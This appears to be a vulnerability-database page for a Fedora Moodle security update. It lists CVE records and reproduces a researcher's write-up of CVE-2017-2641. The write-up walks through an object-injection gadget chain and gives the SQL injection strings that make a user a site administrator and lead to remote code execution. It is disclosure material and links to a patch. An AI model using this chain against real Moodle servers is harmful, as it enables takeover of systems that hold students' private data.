ID FEDORA:D1199604868B Type fedora Reporter Fedora Modified 2017-04-01T17:56:20
Description
Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities.
{"cve": [{"lastseen": "2020-10-03T13:07:42", "description": "In Moodle 3.x, XSS can occur via evidence of prior learning.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2017-03-26T18:59:00", "title": "CVE-2017-2644", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2644"], "modified": "2017-07-12T01:29:00", "cpe": ["cpe:/a:moodle:moodle:3.1.0", "cpe:/a:moodle:moodle:3.2.1", "cpe:/a:moodle:moodle:3.2.0", "cpe:/a:moodle:moodle:3.1.1", "cpe:/a:moodle:moodle:3.1.3", "cpe:/a:moodle:moodle:3.1.2", "cpe:/a:moodle:moodle:3.1.4"], "id": "CVE-2017-2644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2644", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:moodle:moodle:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:beta:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:42", "description": "In Moodle 3.2.x, global search displays user names for unauthenticated users.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-03-26T18:59:00", "title": "CVE-2017-2643", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2643"], "modified": "2017-07-12T01:29:00", "cpe": ["cpe:/a:moodle:moodle:3.2.1", "cpe:/a:moodle:moodle:3.2.0"], "id": "CVE-2017-2643", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:moodle:moodle:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc4:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:42", "description": "In Moodle 2.x and 3.x, SQL injection can occur via user preferences.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-26T18:59:00", "title": "CVE-2017-2641", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2641"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/a:moodle:moodle:3.0.1", "cpe:/a:moodle:moodle:2.7.17", "cpe:/a:moodle:moodle:3.0.2", "cpe:/a:moodle:moodle:3.0.4", "cpe:/a:moodle:moodle:2.7.12", "cpe:/a:moodle:moodle:2.7.9", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:3.1.0", "cpe:/a:moodle:moodle:2.7.16", "cpe:/a:moodle:moodle:3.2.1", "cpe:/a:moodle:moodle:2.7.18", "cpe:/a:moodle:moodle:2.7.10", "cpe:/a:moodle:moodle:3.0.7", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:3.0.3", "cpe:/a:moodle:moodle:2.7.7", "cpe:/a:moodle:moodle:3.2.0", 
"cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.7.11", "cpe:/a:moodle:moodle:3.1.1", "cpe:/a:moodle:moodle:2.7.8", "cpe:/a:moodle:moodle:3.0.6", "cpe:/a:moodle:moodle:2.7.13", "cpe:/a:moodle:moodle:3.1.3", "cpe:/a:moodle:moodle:3.1.2", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.7.15", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:3.0.0", "cpe:/a:moodle:moodle:2.7.14", "cpe:/a:moodle:moodle:3.0.8", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:3.1.4", "cpe:/a:moodle:moodle:3.0.5", "cpe:/a:moodle:moodle:2.7.6"], "id": "CVE-2017-2641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.18:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.16:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.15:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.13:*:*:*:*:*:*:*", 
"cpe:2.3:a:moodle:moodle:2.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.17:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.14:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:beta:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2641", "CVE-2017-2643", "CVE-2017-2644"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. 
", "modified": "2017-04-01T00:26:58", "published": "2017-04-01T00:26:58", "id": "FEDORA:905146076D27", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: moodle-3.1.5-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2641", "CVE-2017-2643", "CVE-2017-2644"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2017-03-31T23:48:47", "published": "2017-03-31T23:48:47", "id": "FEDORA:097FA6075D8D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: moodle-3.1.5-1.fc24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:00:43", "description": "The vulnerability (CVE-2017-2641) allows an attacker to execute PHP code at the vulnerable Moodle server. This vulnerability actually consists of many small vulnerabilities, as described further in the blog post.\r\n\r\nMoodle is a very popular learning management system, deployed in many universities around the world, including top institutes such as MIT, Stanford, the University of Cambridge, and Oxfords\u2019 University.\r\nThese statistics, along with the fact Moodle stores a lot of sensitive information, such as grades, tests, and students private data, makes it a critical target, and the main reason I audited it.\r\n\r\n\r\n\r\nA user is required to exploit the vulnerability. It does not matter which capabilities it has (i.e. 
student, teacher) as long as it is not a guest.\r\n\r\nThis vulnerability works on almost all Moodle versions deployed today, as seen in the Vulnerable Versions section.\r\nI recommend all Moodle administrators to apply the [security patch](https://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-58010).\r\n\r\n#### Vulnerable Versions\r\n\r\n\u201c3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.\u201d\r\n\r\n#### Technical Description\r\n\r\n**Part 1 \u2013 The Problems of Having Too Much Code**\r\n\r\nMoodle is an extremely large system. It contains thousands of files, hundreds of different components and approximately two million lines of PHP code.\r\nAs such, it is obvious different developers wrote different parts of the code, even if those parts interact with each other.\r\n\r\nIn the following white paper, I will demonstrate how having too much code, too many developers, and lacking documentation can lead to critical logical vulnerabilities.\r\nKeep in mind that logical vulnerabilities can and will occur in almost all systems featuring a large code base. Security issues in large code bases is of course not Moodle specific.\r\n\r\nA clear case of \u201csame feature, different code\u201d can be observed at the built-in Ajax mechanism of the system.\r\n\r\nMoodle is featuring a dynamic Ajax system, which allows different components to use the system\u2019s built-in Ajax interface.\r\nThe way Moodle does that is by using \u201cExternal Functions\u201d. 
Each component that wishes to use the built-in Ajax mechanism is registering its own \u201cExternal Function\u201d, specifying the component being called, the function name and the privileges required to use it.\r\n\r\nLater, when components wish to use the Ajax interface, they can simply call the _\u201cservice.php\u201d_ file, supplying the name of the external function they have registered earlier.\r\nThat way Moodle is allowing component developers to use its built-in Ajax interface, saving them the trouble of writing a new one by themselves.\r\n\r\nThe problem starts when Moodle\u2019s core developers has started using this interface too.\r\n\r\nNot so long ago, if a component needed to change the user\u2019s preferences through an Ajax request, it called the _\u201csetuserpref.php\u201d_ file, specifying the name and value of the property it wanted to change.\r\nThis can be viewed in the following code:\r\n\r\n```\r\n// Check access.\r\nif (!confirm_sesskey()) {\r\n\tprint_error('invalidsesskey');\r\n}\r\n\r\n// Get the name of the preference to update, and check it is allowed.\r\n$name = required_param('pref', PARAM_RAW);\r\nif (!isset($USER->ajax_updatable_user_prefs[$name])) {\r\n\tprint_error('notallowedtoupdateprefremotely');\r\n}\r\n\r\n// Get and the value.\r\n$value = required_param('value', $USER->ajax_updatable_user_prefs[$name]);\r\n\r\n// Update\r\nif (!set_user_preference($name, $value)) {\r\n\tprint_error('errorsettinguserpref');\r\n}\r\n\r\necho 'OK';\r\n```\r\n\r\nIn the middle of the code, at the highlighted line, we can see that Moodle is trying to make sure the preference that needs to be changed is defined in the \u201c_ajax_updatable_user_prefs\u201d_ array, which defines which preferences can be changed via Ajax.\r\nThis makes a lot of sense as Moodle does not want malicious attackers, such as us, to change anything that could prove to be critical.\r\n\r\nAlthough most of the user preferences can be changed via other measures, even if 
not through the Ajax interface, Moodle\u2019s developers tried to think ahead and prevented any future abuse of this mechanism.\r\n\r\nThat was true, until the external function \u201c_update_user_preferences\u201d_ has been added.\r\nThis function was added to replace the old \u201c_update_users\u201d_ function, which could \u201cpotentially [be] used to update any user attribute\u201d, which is obviously a very bad thing; and, as the old function was only used to update user\u2019s preferences anyway, there was obviously no need to allow it to change anything else.\r\n\r\nThe main difference between the old function and the new one, is that the old function **could not be accessed through the Ajax interface**, while the new one could, as the supposedly dangerous feature \u2013 the ability to change every user attribute, has been removed.\r\n\r\nOn top of that, they implemented a proper privilege check, so even if an attacker could exploit something using user preferences, it will be able to exploit it only on its own user.\r\nBut that doesn\u2019t really matter if these preferences are later used inside an \u201ceval\u201d or an \u201cexec\u201d call, right? It doesn\u2019t matter which user is exploiting the dangerous function as long as it\u2019s being exploited.\r\n\r\nBut let\u2019s not get ahead of ourselves and have a look at the code of this function:\r\n\r\n```\r\npublic static function update_user_preferences($userid, \u2026, $preferences) { \r\n\t...\r\n\t// If we are trying to edit our own user preferences\r\n\tif ($userid == $USER->id) {\r\n\t\t// Requires the capability to edit our own profile, which we have\r\n\t\trequire_capability('moodle/user:editownmessageprofile', $systemcontext);\r\n\t} else { // Otherwise, we are tring to edit someone else's preferences\r\n\t\t/* Require admin capabilities... */\r\n\t}\r\n\r\n\t// Set the user's preferences. 
\r\n\tforeach ($preferences as $preference) {\r\n\t\tset_user_preference($preference['type'], $preference['value'], $userid);\r\n\t}\r\n\t...\r\n}\r\n```\r\n\r\nBy looking at the code, we can see that we can only edit our own preferences because of the privileges check.\r\nBut still, something is missing. Although the code makes sure we are only editing our own user preferences, it doesn\u2019t check **which** preference we are changing, contrary to the other Ajax page responsible for changing user preferences \u2013 _\u201csetuserpref.php\u201d_.\r\n\r\nA classic example of how different developers, at different times, with different needs in mind write different code for the exact same functionality.\r\nThis time, they assumed user preferences could not be exploited in any malicious way. They assumed it\u2019s unexploitable.\r\n\r\n**Part 2 \u2013 Exploiting the Unexploitable**\r\n\r\nThere\u2019s a reason user preferences are considered unexploitable. They literally have almost no impact in terms of how to system operates \u2013 they are not used in DB queries, they are not defining any components, and the only thing they somewhat impact is GUI part of the system, and even then, only in a miner way.\r\n\r\nSo, what _can_ we do?\r\nWell, let\u2019s have a look at how the GUI parts of the system function.\r\n\r\nMoodle is using a Blocks mechanism to allow components to display relevant data to the user. These blocks can be added and removed by the user.\r\n\r\nOne of these blocks \u2013 \u201ccourse_overview\u201d, is used to display the user a list of its enrolled courses. In order to store the order of the courses he enrolled into, The Course Overview block mechanism is using a specific user preference called \u201c_course_overview_course_sortorder\u201d_. 
This preference store a list of all courses IDs the user has enrolled into, ordered by the time he enrolled into them.\r\n\r\nThis list separates the course IDs using a comma, so the following line of code is used to split the list:\r\n\r\n```\r\nreturn explode(',', $value); // Split the IDs using a comma\r\n```\r\n\r\nBut what happens if that preference is empty? In that case, the block mechanism is trying to retrieve the legacy preference, \u201c_course_overview_course_order\u201d_, which again contains a list of all courses IDs, but in a rather different way.\r\nThis time, in order to retrieve to IDs the block mechanism actually executes:\r\n\r\n```\r\n$order = unserialize($value); // Unserialize the course IDs\r\n```\r\n\r\nAn unserialize call. What a surprise.\r\nAnother classic example of how legacy code and backwards compatibility can compromise your entire system if you still use it, and how different developers from different times can implement the exact same feature using completely different ways.\r\n\r\nFor us, this means we can now exploit an Object Injection attack.\r\nUnfortunately, because of the Moodle is filtering user input, there are some limitations about what we can injection:\r\n\r\n1. We cannot inject Null bytes. At all. This means we cannot set any protected or private object properties, because when PHP is serializing them it adds null bytes to their serialized declaration.\r\n2. Although there are a lot of classes in the code base, most of them are unreachable. They are either not included when our payload is unserialized, or cannot be reached using an autoload function.\r\n\r\nThese limitations lead to a pretty difficult Object Injection. Yet, I did write RCE in the title, didn\u2019t I?\r\n\r\n**Part 3 \u2013 Taking the Fun Out of Object Injections**\r\n\r\nBecause of the specified limitations, we can only use public properties of already included classes. 
We can\u2019t also use any code that relies on any protected or private properties as well, as they will be initialized as their default value or, most of the time, just a NULL.\r\n\r\nThis really narrows our attack surface. Almost all classes use protected properties in some way, and most of them doesn\u2019t feature any public properties at all.\r\n\r\nThe first step is to understand exactly which magic PHP methods we can use.\r\nWe can obviously call \u201c___wakeup()\u201d_, which is called when the object is unserialized, and _\u201c__destruct()\u201d_, which is called when the object is destroyed, but can we call another very popular method \u2013 \u201c___toString()\u201d_?\r\n\r\nWell, if we\u2019ll look at the code that\u2019s being executed right after our payload is unserialized we will see that our unserialized payload is treated as an array:\r\n\r\n```\r\nfunction block_course_overview_update_myorder($sortorder) {\r\n // $sortorder is our unserialized payload.\r\n $value = implode(',', $sortorder);\r\n ...\r\n set_user_preference('course_overview_course_sortorder', $value);\r\n}\r\n```\r\n\r\nThis function tries to join our unserialized array members into one big happy string. But, if one of our members was actually, say, an Object, its _\u201c__toString()\u201d_ method would have been called.\r\n\r\nSo we can not only execute one object\u2019s _\u201c__toString()\u201d_ method, we could execute how many of them as we\u2019d like.\r\n\r\nBut what could we possibly do with a _\u201c__toString()\u201d?_\r\nWell, let\u2019s have a look at how the \u201c_attribute_format_\u201d abstract class implemented its own _\u201c__toString()\u201d_ method:\r\n\r\n```\r\n/**\r\n * Convert this to an element and then to a string\r\n * @return string\r\n */\r\npublic function __toString() {\r\n return $this->determine_format()->html();\r\n}\r\n```\r\n\r\nLooks simple, right? 
Let\u2019s look at one code flow we can access by calling the _\u201cdetermine_format()\u201d_ method of the class _\u201cfeedback\u201d_, which inherits from our _\u201cattribute_format\u201d_ class:\r\n\r\n```\r\n/**\r\n* Create a text_attribute for this ui element.\r\n*\r\n* @return text_attribute\r\n*/\r\npublic function determine_format() {\r\n return new text_attribute(\r\n $this->get_name(),\r\n $this->get_value(),\r\n $this->get_label(),\r\n $this->is_disabled()\r\n );\r\n}\r\n\r\n/**\r\n* Determine if this input should be disabled based on the other settings.\r\n*\r\n* @return boolean Should this input be disabled when the page loads.\r\n*/\r\npublic function is_disabled() {\r\n ...\r\n if ($this->grade->grade_item->is_overridable_item() \u2026) {\r\n $overridden = 1;\r\n }\r\n \u2026\r\n}\r\n```\r\n\r\nSee that _\u201cis_overridable_item()\u201d_ call? That\u2019s another method call, but this time using one of the object\u2019s properties as an object.\r\nNow we are getting somewhere. Because we control the property, we control the object being called, which really expands our attack surface.\r\nOne of the classes implementing the _\u201cis_overridable_item()\u201d_ method is the _\u201cgrade_item\u201d_ class\r\n\r\nFollowing a series of method calls, we eventually arrive to the _\u201cupdate\u201d_ method:\r\n\r\n```\r\n/**\r\n * Is the grade item overridable\r\n*/\r\npublic function is_overridable_item() {\r\n ...\r\n return ... ($this->is_external_item() or $this->is_calculated() ...);\r\n}\r\n\r\n/**\r\n * Checks if grade calculated. Returns this object's calculation.\r\n*/\r\npublic function is_calculated() {\r\n ...\r\n if (!$this->calculation_normalized and strpos($this->calculation, '[[') !== false) {\r\n $this->set_calculation($this->calculation);\r\n }\r\n ...\r\n}\r\n\r\n/**\r\n * Sets this item's calculation (creates it) if not yet set, or\r\n * updates it if already set (in the DB). 
If no calculation is given,\r\n * the calculation is removed.\r\n*/\r\npublic function set_calculation($formula) {\r\n ...\r\n $this->calculation_normalized = true;\r\n return $this->update();\r\n}\r\n\r\n/**\r\n * Updates this object in the Database, based on its object variables. ID must be set.\r\n*/\r\npublic function update($source=null) {\r\n ...\r\n\r\n // Get the data to update (IDs, column names, values)\r\n $data = $this->get_record_data();\r\n\r\n // Update the record in the database\r\n $DB->update_record($this->table, $data);\r\n\r\n ...\r\n}\r\n```\r\n\r\nAs can be seen, the _\u201cupdate\u201d_ method is responsible for updating the database with the data stored in the object. It\u2019s using the property \u201c_table\u201d_ as the table name to update and the data is derived straight from the object own properties.\r\n\r\nSo, basically, that\u2019s a win. Using our object injection, we could update any row we\u2019d like in the entire database. We could update administrator accounts, passwords, the site configuration, and basically whatever we want.\r\n\r\nThat being said, there are a few limitations of how we can update:\r\n\r\n1. The update SQL statement always ends with a WHERE condition, checking for an ID we specify it.\r\n2. We cannot exploit SQL injections in our data. The values we are setting are escaped and the fields we are updating are checked against the actual fields of the table, so we can\u2019t use any field that isn\u2019t already there.\r\n\r\nBut why do we even care about SQL Injections? We can already update whatever we want. Right?\r\n\r\n**Wrong.** We can update everything we\u2019d like as long as we know **the ID of the row** we want to update.\r\nSo, if for example we are trying to update the administrator\u2019s password, we either need to guess its user ID, or just brute-force every account in the database. 
And as we are 1337 h4x0rs, we are trying to minimize the impact on the server as much as possible.\r\n\r\n**Part 4 \u2013 1337 H4x0rs**\r\n\r\nSo, first, we don\u2019t want to start changing passwords for every user in the system. In fact, we don\u2019t want to change anyone\u2019s password, as this will probably be pretty suspicious.\r\nIn order to bypass that we could add our user as another administrator in the system by changing the \u201c_site_admins\u201d_ configuration value, stored in the _\u201cconfig\u201d_ table.\r\n\r\nBut how can we guess the ID of that specific configuration in the table?\r\nWell, we can\u2019t. But we can try to change the WHERE SQL statement somehow.\r\n\r\nTo do that, we will need to use an SQL Injection after all. As we can\u2019t exploit any of the data fields, we will have to inject our SQL in the table name itself, which is not being escaped anywhere.\r\n\r\nBut that raises another problem \u2013 before the UPDATE statement is executed, Moodle is querying the database for the column names and types of our specified table.\r\n\r\nThis means we will have to make the same SQL Injection work both on the SELECT statement, which should return the correct data for the table, and the UPDATE statement, which should update the _\u201csite_admins\u201d_ configuration value.\r\n\r\nLet\u2019s have a look at both statements:\r\n\r\n```\r\nSELECT column_name, data_type, character_maximum_length, numeric_precision,\r\n\tnumeric_scale, is_nullable, column_type, \r\n\tcolumn_default, column_key, extra\r\nFROM information_schema.columns\r\nWHERE table_name = '[TABLE_NAME]'\r\nORDER BY ordinal_position\r\n```\r\n\r\n```\r\nUPDATE [TABLE_NAME] SET [DATA] WHERE WHERE id='[ID]'\r\n```\r\n\r\nIt is clear the only injection point we have in both tables is the table name.\r\n\r\nOne way to exploit this SQL Injection is by starting a multiline comment (/*) after the table we wish to update, and close it in one of our data parameters. 
That way our data could contain our altered WHERE statement, filtering the data by the configuration name instead of its ID.\r\nSo, our payload thus far looks like this:\r\n\r\n```\r\nSELECT \u2026 WHERE table_name = 'config' /*'\r\nORDER BY ordinal_position\r\n```\r\n\r\n```\r\nUPDATE config' /* SET field='*/ SET value=our_user_id WHERE name=site_admins-- WHERE id='[ID]'\r\n```\r\n\r\nBut how can we insert a comment in the table name and still make both the SELECT statement and UPDATE statement to work?\r\nClearly, the UPDATE statement will not work because of the added apostrophe after the table name, and the select statement will not work because we can\u2019t open a multiline comment without closing it in SQL.\r\n\r\nWhat happens if we will insert the multiline comment into our table name without closing the string, and then just continue the WHERE condition using another OR statement?\r\nI mean, something like this:\r\n\r\n```\r\nSELECT \u2026 WHERE table_name = 'config /*' or table_name LIKE '%config'\r\nORDER BY ordinal_position\r\n```\r\n\r\n```\r\nUPDATE config /*' or table_name LIKE '%config SET field='*/ SET value=our_user_id WHERE name=site_admins-- WHERE id='[ID]'\r\n```\r\n\r\nWhile the SELECT statement is pretty much self-explanatory, the UPDATE statement probably needs a bit more explanation.\r\nAllow me to display it the way MySQL will parse it:\r\n\r\n```\r\nUPDATE config /*' or table_name LIKE '%config SET field='*/ SET value=our_user_id WHERE name=site_admins -- WHERE id='[ID]'\r\n```\r\n\r\nAs you can now clearly see, we\u2019ve commented out everything between the table name and the first data value we control. That way, we can use SQL statements only on the UPDATE statement, without effecting the SELECT statement.\r\n\r\nWe then just set the configuration value to whatever we want, preferably our user ID, and then just add our improved WHERE statement, filtering the table based on the configuration name. 
Finally, we add a single-line comment in order to remove the built-in WHERE statement, and that\u2019s it. We successfully exploiting the same SQL Injection on two different queries.\r\n\r\nSo, all we have to do now is wait for the configuration cache to refresh, which should happen every day or so, or just force refresh it ourselves by removing the configuration value of \u201callversionshash\u201d, which stores a SHA-1 hash of all the core files in the system. Changing the value of this configuration will make Moodle think it went through a firmware update and just refresh the entire cache for us.\r\n\r\nAfter gaining full administrator privileges executing code is as simple as uploading a new plugin or template to the server.\r\n\r\nSo, after exploiting some false assumptions, an Object Injection, a double SQL Injection and a permissive Administrator dashboard, we finally won. **We executed code on the server.**", "published": "2017-03-21T00:00:00", "type": "seebug", "title": "Moodle Remote Code Execution Vulnerability (CVE-2017-2641)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92807", "id": "SSV:92807", "sourceData": "", "cvss": {"score": 7.5, "vector": 